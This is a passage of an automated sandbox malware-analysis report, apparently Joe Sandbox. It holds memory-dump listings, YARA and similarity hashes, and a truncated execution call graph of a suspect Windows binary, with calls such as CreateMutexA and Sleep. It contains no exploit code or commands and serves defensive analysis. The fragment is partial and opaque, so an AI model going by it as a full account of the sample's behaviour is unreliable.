                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                              • Instruction ID: 1078d66fc64a2230924d9ec22260c70e19866084ee61491fa719115aa32a63a1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BB12632D046859FDB21CF28C8817AEBBE5EF45350F14C16FE859EB242D6349D02DBA2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                                              • Opcode ID: 6fec22708685dfd0ab50ccbf8cf0361d57dfd1e632e3e299a5c1aa773b150514
                                                                                                                                                                                                                                              • Instruction ID: 8936b254c9f4e6e6a34b35a74c1c103953180e2bad45fe1738d6a1cd9dd0fb3c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fec22708685dfd0ab50ccbf8cf0361d57dfd1e632e3e299a5c1aa773b150514
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04213D71A00219AFDF00EBA4CC859BEBBB9EF08711F100055FA06B7251DB749D05ABA0

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                              Total number of Nodes:1896
                                                                                                                                                                                                                                              Total number of Limit Nodes:15
                                                                                                                                                                                                                                              execution_graph 11669 bd9ab8 11671 bd9acc 11669->11671 11672 bd9b08 11671->11672 11673 bd9b4b shared_ptr 11672->11673 11677 bda917 11672->11677 11674 bd9b59 11673->11674 11675 bd9b65 11673->11675 11679 be80c0 RtlAllocateHeap 11674->11679 11676 be7a00 RtlAllocateHeap 11675->11676 11678 bd9b74 11676->11678 11680 bda953 Sleep CreateMutexA 11677->11680 11681 c06c6a RtlAllocateHeap 11677->11681 11682 bd5c10 4 API calls 11678->11682 11683 bda903 11679->11683 11685 bda98e 11680->11685 11681->11680 11684 bd9b7c 11682->11684 11698 bd8b30 11684->11698 11687 bd9b8d 11688 be8220 RtlAllocateHeap 11687->11688 11689 bd9b9c 11688->11689 11690 be7a00 RtlAllocateHeap 11689->11690 11691 bd9ca9 11690->11691 11692 bd5c10 4 API calls 11691->11692 11693 bd9cb1 11692->11693 11694 bd8b30 4 API calls 11693->11694 11695 bd9cc2 11694->11695 11696 be8220 RtlAllocateHeap 11695->11696 11697 bd9cd1 11696->11697 11699 bd8b7c 11698->11699 11700 be7a00 RtlAllocateHeap 11699->11700 11701 bd8b8c 11700->11701 11702 bd5c10 4 API calls 11701->11702 11703 bd8b97 11702->11703 11704 be80c0 RtlAllocateHeap 11703->11704 11705 bd8be3 11704->11705 11706 be80c0 RtlAllocateHeap 11705->11706 11707 bd8c35 11706->11707 11708 be8220 RtlAllocateHeap 11707->11708 11710 bd8c47 shared_ptr 11708->11710 11709 bd8d01 shared_ptr std::future_error::future_error 11709->11687 11710->11709 11711 c06c6a RtlAllocateHeap 11710->11711 11712 bd8d2d 11711->11712 11713 be7a00 RtlAllocateHeap 11712->11713 11714 bd8d8f 11713->11714 11715 bd5c10 4 API calls 11714->11715 11716 bd8d9a 11715->11716 11717 be80c0 RtlAllocateHeap 11716->11717 11718 bd8dec 11717->11718 11719 be8220 RtlAllocateHeap 11718->11719 11721 bd8dfe shared_ptr 11719->11721 11720 bd8e7e shared_ptr std::future_error::future_error 11720->11687 11721->11720 11722 c06c6a RtlAllocateHeap 11721->11722 11723 bd8eaa 11722->11723 11724 be7a00 RtlAllocateHeap 11723->11724 11725 bd8f0f 11724->11725 11726 bd5c10 4 API calls 11725->11726 11727 bd8f1a 11726->11727 11728 be80c0 RtlAllocateHeap 11727->11728 11729 bd8f6c 11728->11729 11730 be8220 RtlAllocateHeap 11729->11730 11731 bd8f7e shared_ptr 11730->11731 11732 bd8ffe shared_ptr std::future_error::future_error 11731->11732 11733 c06c6a RtlAllocateHeap 11731->11733 11732->11687 11734 bd902a 11733->11734 11735 bd42b0 11738 bd3ac0 11735->11738 11737 bd42bb shared_ptr 11739 bd3af9 11738->11739 11740 c06c6a RtlAllocateHeap 11739->11740 11745 bd3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11739->11745 11741 bd3be6 11740->11741 11742 bd32d0 6 API calls 11741->11742 11744 bd3c38 11741->11744 11742->11744 11743 bd32d0 6 API calls 11747 bd3c5f 11743->11747 11744->11743 11744->11747 11745->11737 11746 bd3c68 11746->11737 11747->11746 11748 bd3810 4 API calls 11747->11748 11749 bd3cdb 11748->11749 9867 bd5cad 9869 bd5caf shared_ptr 9867->9869 9868 bd5d17 shared_ptr std::future_error::future_error 9869->9868 9870 c06c6a RtlAllocateHeap 9869->9870 9871 bd5d47 __cftof 9870->9871 9871->9871 9872 be80c0 RtlAllocateHeap 9871->9872 9874 bd5e3e 9872->9874 9873 bd5ea6 shared_ptr std::future_error::future_error 9874->9873 9875 c06c6a RtlAllocateHeap 9874->9875 9876 bd5ed2 9875->9876 9877 bd5ffe shared_ptr std::future_error::future_error 9876->9877 9878 c06c6a RtlAllocateHeap 9876->9878 9879 bd601b 9878->9879 9880 be80c0 RtlAllocateHeap 9879->9880 9881 bd6089 9880->9881 9882 be80c0 RtlAllocateHeap 9881->9882 9883 bd60bd 9882->9883 9884 be80c0 RtlAllocateHeap 9883->9884 9885 bd60ee 9884->9885 9886 be80c0 RtlAllocateHeap 9885->9886 9887 bd611f 9886->9887 9888 be80c0 RtlAllocateHeap 9887->9888 9890 bd6150 9888->9890 9889 bd65b1 shared_ptr std::future_error::future_error 9890->9889 9891 c06c6a RtlAllocateHeap 9890->9891 9892 bd65dc 9891->9892 9915 be7a00 9892->9915 9894 bd66a6 9929 bd5c10 9894->9929 9896 bd66ac 9897 bd5c10 4 API calls 9896->9897 9898 bd66b1 9897->9898 9980 bd22c0 9898->9980 9900 bd66c9 shared_ptr 9901 be7a00 RtlAllocateHeap 9900->9901 9902 bd6732 9901->9902 9903 bd5c10 4 API calls 9902->9903 9904 bd673d 9903->9904 9905 bd22c0 4 API calls 9904->9905 9914 bd6757 shared_ptr 9905->9914 9906 bd6852 9907 be80c0 RtlAllocateHeap 9906->9907 9909 bd689c 9907->9909 9908 be7a00 RtlAllocateHeap 9908->9914 9910 be80c0 RtlAllocateHeap 9909->9910 9913 bd68e3 shared_ptr std::future_error::future_error 9910->9913 9911 bd5c10 4 API calls 9911->9914 9912 bd22c0 4 API calls 9912->9914 9914->9906 9914->9908 9914->9911 9914->9912 9916 be7a26 9915->9916 9917 be7a2d 9916->9917 9918 be7a62 9916->9918 9919 be7a81 9916->9919 9917->9894 9920 be7ab9 9918->9920 9921 be7a69 9918->9921 9922 bed3e2 RtlAllocateHeap 9919->9922 9926 be7a76 __cftof 9919->9926 9923 bd2480 RtlAllocateHeap 9920->9923 9924 bed3e2 RtlAllocateHeap 9921->9924 9922->9926 9925 be7a6f 9923->9925 9924->9925 9925->9926 9927 c06c6a RtlAllocateHeap 9925->9927 9926->9894 9928 be7ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 9927->9928 9928->9894 9983 bd5940 9929->9983 9931 bd5c54 9986 bd4b30 9931->9986 9933 bd5c7b shared_ptr 9934 bd5d17 shared_ptr std::future_error::future_error 9933->9934 9935 c06c6a RtlAllocateHeap 9933->9935 9934->9896 9936 bd5d47 __cftof 9935->9936 9936->9936 9937 be80c0 RtlAllocateHeap 9936->9937 9939 bd5e3e 9937->9939 9938 bd5ea6 shared_ptr std::future_error::future_error 9938->9896 9939->9938 9940 c06c6a RtlAllocateHeap 9939->9940 9941 bd5ed2 9940->9941 9942 bd5ffe shared_ptr std::future_error::future_error 9941->9942 9943 c06c6a RtlAllocateHeap 9941->9943 9942->9896 9944 bd601b 9943->9944 9945 be80c0 RtlAllocateHeap 9944->9945 9946 bd6089 9945->9946 9947 be80c0 RtlAllocateHeap 9946->9947 9948 bd60bd 9947->9948 9949 be80c0 RtlAllocateHeap 9948->9949 9950 bd60ee 9949->9950 9951 be80c0 RtlAllocateHeap 9950->9951 9952 bd611f 9951->9952 9953 be80c0 RtlAllocateHeap 9952->9953 9955 bd6150 9953->9955 9954 bd65b1 shared_ptr std::future_error::future_error 9954->9896 9955->9954 9956 c06c6a RtlAllocateHeap 9955->9956 9957 bd65dc 9956->9957 9958 be7a00 RtlAllocateHeap 9957->9958 9959 bd66a6 9958->9959 9960 bd5c10 4 API calls 9959->9960 9961 bd66ac 9960->9961 9962 bd5c10 4 API calls 9961->9962 9963 bd66b1 9962->9963 9964 bd22c0 4 API calls 9963->9964 9965 bd66c9 shared_ptr 9964->9965 9966 be7a00 RtlAllocateHeap 9965->9966 9967 bd6732 9966->9967 9968 bd5c10 4 API calls 9967->9968 9969 bd673d 9968->9969 9970 bd22c0 4 API calls 9969->9970 9979 bd6757 shared_ptr 9970->9979 9971 bd6852 9972 be80c0 RtlAllocateHeap 9971->9972 9974 bd689c 9972->9974 9973 be7a00 RtlAllocateHeap 9973->9979 9975 be80c0 RtlAllocateHeap 9974->9975 9978 bd68e3 shared_ptr std::future_error::future_error 9975->9978 9976 bd5c10 4 API calls 9976->9979 9977 bd22c0 4 API calls 9977->9979 9978->9896 9979->9971 9979->9973 9979->9976 9979->9977 10201 bd2280 9980->10201 9993 be7f80 9983->9993 9985 bd596b 9985->9931 9987 bd4dc2 9986->9987 9991 bd4b92 9986->9991 9987->9933 9989 bd4ce5 9989->9987 9990 be8ca0 RtlAllocateHeap 9989->9990 9990->9989 9991->9989 10008 c06da6 9991->10008 10013 be8ca0 9991->10013 9994 be7f9e __cftof 9993->9994 9995 be7fc7 9993->9995 9994->9985 9996 be80b3 9995->9996 10000 be803e 9995->10000 10001 be801b 9995->10001 9997 be9270 RtlAllocateHeap 9996->9997 9998 be80b8 9997->9998 9999 bd2480 RtlAllocateHeap 9998->9999 10002 be80bd 9999->10002 10004 bed3e2 RtlAllocateHeap 10000->10004 10006 be802c __cftof 10000->10006 10001->9998 10003 bed3e2 RtlAllocateHeap 10001->10003 10003->10006 10004->10006 10005 c06c6a RtlAllocateHeap 10005->9996 10006->10005 10007 be8095 shared_ptr 10006->10007 10007->9985 10009 c06dc2 10008->10009 10010 c06db4 10008->10010 10009->9991 10028 c06d19 10010->10028 10014 be8dc9 10013->10014 10015 be8cc3 10013->10015 10016 be9270 RtlAllocateHeap 10014->10016 10019 be8d2f 10015->10019 10020 be8d05 10015->10020 10017 be8dce 10016->10017 10018 bd2480 RtlAllocateHeap 10017->10018 10026 be8d16 __cftof 10018->10026 10022 bed3e2 RtlAllocateHeap 10019->10022 10019->10026 10020->10017 10021 be8d10 10020->10021 10024 bed3e2 RtlAllocateHeap 10021->10024 10022->10026 10023 c06c6a RtlAllocateHeap 10025 be8dd8 10023->10025 10024->10026 10026->10023 10027 be8d8b shared_ptr __cftof 10026->10027 10027->9991 10033 c0690a 10028->10033 10032 c06d3d 10032->9991 10034 c0692a 10033->10034 10040 c06921 10033->10040 10034->10040 10047 c0a671 10034->10047 10041 c06d52 10040->10041 10042 c06d8f 10041->10042 10044 c06d5f 10041->10044 10185 c0b67d 10042->10185 10046 c06d6e 10044->10046 10180 c0b6a1 10044->10180 10046->10032 10048 c0a67b __dosmaperr 10047->10048 10049 c0d82f __dosmaperr RtlAllocateHeap 10048->10049 10050 c0a694 10048->10050 10051 c0a6bc __dosmaperr 10049->10051 10052 c0694a 10050->10052 10069 c08bec 10050->10069 10054 c0a6fc 10051->10054 10055 c0a6c4 __dosmaperr 10051->10055 10061 c0b5fb 10052->10061 10057 c0a49f __dosmaperr RtlAllocateHeap 10054->10057 10058 c0adf5 ___free_lconv_mon RtlAllocateHeap 10055->10058 10059 c0a707 10057->10059 10058->10050 10060 c0adf5 ___free_lconv_mon RtlAllocateHeap 10059->10060 10060->10050 10062 c06960 10061->10062 10063 c0b60e 10061->10063 10065 c0b628 10062->10065 10063->10062 10102 c0f5ab 10063->10102 10066 c0b650 10065->10066 10067 c0b63b 10065->10067 10066->10040 10067->10066 10115 c0e6b1 10067->10115 10070 c08bf1 __cftof 10069->10070 10074 c08bfc __cftof 10070->10074 10075 c0d634 10070->10075 10096 c065ed 10074->10096 10076 c0d640 __cftof 10075->10076 10077 c0a7c8 __dosmaperr RtlAllocateHeap 10076->10077 10081 c0d667 __cftof 10076->10081 10083 c0d66d __cftof 10076->10083 10077->10081 10078 c0d6b2 10079 c075f6 __dosmaperr RtlAllocateHeap 10078->10079 10080 c0d6b7 10079->10080 10082 c06c5a __cftof RtlAllocateHeap 10080->10082 10081->10078 10081->10083 10095 c0d69c 10081->10095 10082->10095 10084 c0d726 10083->10084 10085 c0d81b __cftof 10083->10085 10087 c0d751 __cftof 10083->10087 10084->10087 10099 c0d62b 10084->10099 10086 c065ed __cftof 3 API calls 10085->10086 10088 c0d82e 10086->10088 10090 c0a671 __cftof 4 API calls 10087->10090 10093 c0d7a5 10087->10093 10087->10095 10090->10093 10092 c0d62b __cftof 4 API calls 10092->10087 10094 c0a671 __cftof 4 API calls 10093->10094 10093->10095 10094->10095 10095->10074 10097 c064c7 __cftof 3 API calls 10096->10097 10098 c065fe 10097->10098 10100 c0a671 __cftof 4 API calls 10099->10100 10101 c0d630 10100->10101 10101->10092 10103 c0f5b7 __cftof 10102->10103 10104 c0a671 __cftof 4 API calls 10103->10104 10106 c0f5c0 __cftof 10104->10106 10105 c0f606 10105->10062 10106->10105 10111 c0f62c 10106->10111 10108 c0f5ef __cftof 10108->10105 10109 c08bec __cftof 4 API calls 10108->10109 10110 c0f62b 10109->10110 10112 c0f63a __cftof 10111->10112 10114 c0f647 10111->10114 10113 c0f35f __cftof RtlAllocateHeap 10112->10113 10112->10114 10113->10114 10114->10108 10116 c0a671 __cftof 4 API calls 10115->10116 10117 c0e6bb 10116->10117 10120 c0e5c9 10117->10120 10119 c0e6c1 10119->10066 10124 c0e5d5 __cftof 10120->10124 10121 c0e5f6 10121->10119 10122 c0e5ef __cftof 10122->10121 10123 c08bec __cftof 4 API calls 10122->10123 10125 c0e668 10123->10125 10124->10122 10127 c0adf5 ___free_lconv_mon RtlAllocateHeap 10124->10127 10130 c0e6a4 10125->10130 10131 c0a72e 10125->10131 10127->10122 10130->10119 10132 c0a739 __dosmaperr 10131->10132 10134 c0d82f __dosmaperr RtlAllocateHeap 10132->10134 10136 c0a745 10132->10136 10133 c08bec __cftof 4 API calls 10135 c0a7c7 10133->10135 10138 c0a769 __dosmaperr 10134->10138 10136->10133 10137 c0a7be 10136->10137 10145 c0e4b0 10137->10145 10139 c0a7a5 10138->10139 10140 c0a771 __dosmaperr 10138->10140 10142 c0a49f __dosmaperr RtlAllocateHeap 10139->10142 10141 c0adf5 ___free_lconv_mon RtlAllocateHeap 10140->10141 10141->10136 10143 c0a7b0 10142->10143 10144 c0adf5 ___free_lconv_mon RtlAllocateHeap 10143->10144 10144->10136 10146 c0e5c9 __cftof 4 API calls 10145->10146 10147 c0e4c3 10146->10147 10164 c0e259 10147->10164 10150 c0e4dc 10150->10130 10154 c0e51f 10155 c0adf5 ___free_lconv_mon RtlAllocateHeap 10154->10155 10157 c0e52d 10155->10157 10156 c0e512 10158 c0e51a 10156->10158 10161 c0e535 __cftof 10156->10161 10157->10130 10159 c075f6 __dosmaperr RtlAllocateHeap 10158->10159 10159->10154 10160 c0e561 10160->10154 10176 c0e14b 10160->10176 10161->10160 10162 c0adf5 ___free_lconv_mon RtlAllocateHeap 10161->10162 10162->10160 10165 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10164->10165 10166 c0e26b 10165->10166 10166->10150 10167 c0b04b 10166->10167 10169 c0b059 __dosmaperr 10167->10169 10168 c075f6 __dosmaperr RtlAllocateHeap 10170 c0b087 10168->10170 10169->10168 10169->10170 10170->10154 10171 c0e6c4 10170->10171 10172 c0e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10171->10172 10173 c0e6e4 __cftof 10172->10173 10174 c0e75a __cftof std::future_error::future_error 10173->10174 10175 c0e32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10173->10175 10174->10156 10175->10174 10177 c0e157 __cftof 10176->10177 10178 c0e198 __cftof RtlAllocateHeap 10177->10178 10179 c0e16e __cftof 10178->10179 10179->10154 10181 c0690a __cftof 4 API calls 10180->10181 10182 c0b6be 10181->10182 10184 c0b6ce std::future_error::future_error 10182->10184 10190 c0f1bf 10182->10190 10184->10046 10186 c0a671 __cftof 4 API calls 10185->10186 10187 c0b688 10186->10187 10188 c0b5fb __cftof 4 API calls 10187->10188 10189 c0b698 10188->10189 10189->10046 10191 c0690a __cftof 4 API calls 10190->10191 10192 c0f1df __cftof 10191->10192 10193 c0b04b __cftof RtlAllocateHeap 10192->10193 10195 c0f29d std::future_error::future_error 10192->10195 10196 c0f232 __cftof 10192->10196 10193->10196 10195->10184 10197 c0f2c2 10196->10197 10198 c0f2df 10197->10198 10199 c0f2ce 10197->10199 10198->10195 10199->10198 10200 c0adf5 ___free_lconv_mon RtlAllocateHeap 10199->10200 10200->10198 10202 bd2296 10201->10202 10205 c087f8 10202->10205 10208 c07609 10205->10208 10207 bd22a4 10207->9900 10209 c07631 10208->10209 10210 c07649 10208->10210 10211 c075f6 __dosmaperr RtlAllocateHeap 10209->10211 10210->10209 10212 c07651 10210->10212 10213 c07636 10211->10213 10214 c0690a __cftof 4 API calls 10212->10214 10215 c06c5a __cftof RtlAllocateHeap 10213->10215 10216 c07661 10214->10216 10217 c07641 std::future_error::future_error 10215->10217 10221 c07bc4 10216->10221 10217->10207 10237 c0868d 10221->10237 10223 c076e8 10234 c07a19 10223->10234 10224 c07be4 10225 c075f6 __dosmaperr RtlAllocateHeap 10224->10225 10226 c07be9 10225->10226 10227 c06c5a __cftof RtlAllocateHeap 10226->10227 10227->10223 10228 c07bd5 10228->10223 10228->10224 10244 c07d15 10228->10244 10252 c08168 10228->10252 10257 c07dc2 10228->10257 10262 c07de8 10228->10262 10291 c07f36 10228->10291 10235 c0adf5 ___free_lconv_mon RtlAllocateHeap 10234->10235 10236 c07a29 10235->10236 10236->10217 10238 c08692 10237->10238 10239 c086a5 10237->10239 10240 c075f6 __dosmaperr RtlAllocateHeap 10238->10240 10239->10228 10241 c08697 10240->10241 10242 c06c5a __cftof RtlAllocateHeap 10241->10242 10243 c086a2 10242->10243 10243->10228 10313 c07d34 10244->10313 10246 c07d1a 10247 c07d31 10246->10247 10248 c075f6 __dosmaperr RtlAllocateHeap 10246->10248 10247->10228 10249 c07d23 10248->10249 10250 c06c5a __cftof RtlAllocateHeap 10249->10250 10251 c07d2e 10250->10251 10251->10228 10253 c08171 10252->10253 10254 c08178 10252->10254 10322 c07b50 10253->10322 10254->10228 10258 c07dcb 10257->10258 10260 c07dd2 10257->10260 10259 c07b50 4 API calls 10258->10259 10261 c07dd1 10259->10261 10260->10228 10261->10228 10263 c07e09 10262->10263 10264 c07def 10262->10264 10267 c075f6 __dosmaperr RtlAllocateHeap 10263->10267 10269 c07e39 10263->10269 10265 c07fbb 10264->10265 10266 c07f4f 10264->10266 10264->10269 10270 c08001 10265->10270 10271 c07fc2 10265->10271 10281 c07f92 10265->10281 10278 